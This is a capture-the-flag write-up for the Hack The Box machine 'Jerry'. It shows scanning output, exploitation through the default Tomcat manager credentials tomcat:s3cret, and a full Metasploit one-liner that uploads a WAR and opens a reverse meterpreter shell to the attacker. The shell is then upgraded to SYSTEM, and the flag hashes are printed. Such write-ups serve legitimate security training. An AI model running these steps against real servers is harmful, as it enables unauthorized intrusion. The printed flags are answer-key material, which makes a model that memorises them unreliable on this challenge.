Eui Chul Chung

Vulnerability Researcher
PEN: OSCP, OSEP, OSCE3
WEB: OSWA, OSWE
EXP: OSED


Categories:

Tags:
Area of Interest:
Categories:
Languages:
Vulnerabilities:



About

Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is often found exposed and configured with common or weak credentials.

Enumeration

Running the script portscan.sh reveals a single attack vector, HTTP.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ sudo portscan.sh 10.129.136.9

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ cat PortScan\(10.129.136.9\)

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Exploitation

HTTP

Running nikto reveals that the target is hosting Apache Tomcat with a default manager credential of tomcat:s3cret.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ nikto -host 10.129.136.9 -port 8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.136.9
+ Target Hostname:    10.129.136.9
+ Target Port:        8080
+ Start Time:         2023-10-17 03:34:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).
+ /manager/status: Tomcat Server Status interface found (pass protected).
+ 8205 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-10-17 04:00:04 (GMT-4) (1507 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

By executing the Metasploit module exploit/multi/http/tomcat_mgr_upload with the credential found, I’m able to gain a shell as the user JERRY$.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ msfconsole -q -x 'use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 10.129.136.9; set RPORT 8080; set HttpUsername tomcat; set HttpPassword s3cret; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
RHOSTS => 10.129.136.9
RPORT => 8080
HttpUsername => tomcat
HttpPassword => s3cret
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying vFmY9...
[*] Executing vFmY9...
[*] Sending stage (58829 bytes) to 10.129.136.9
[*] Undeploying vFmY9 ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.136.9:49192) at 2023-10-17 04:15:10 -0400

meterpreter > getuid
Server username: JERRY$

Given that the user JERRY$ is a machine account, it is obvious that we already have complete access to the target. It is the payload java/meterpreter/reverse_tcp that was used in the exploit that is causing this confusion. By upgrading the shell with the module post/multi/manage/shell_to_meterpreter, I’m able to gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run post/multi/manage/shell_to_meterpreter

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api, stdapi_sys_process_kill
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.16.9:4433
[*] Sending stage (200774 bytes) to 10.129.136.9
[*] Meterpreter session 2 opened (10.10.16.9:4433 -> 10.129.136.9:49193) at 2023-10-17 04:17:06 -0400
[*] Stopping exploit/multi/handler

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flag 2 for the price of 1.txt.

meterpreter > cat 'C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt'
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e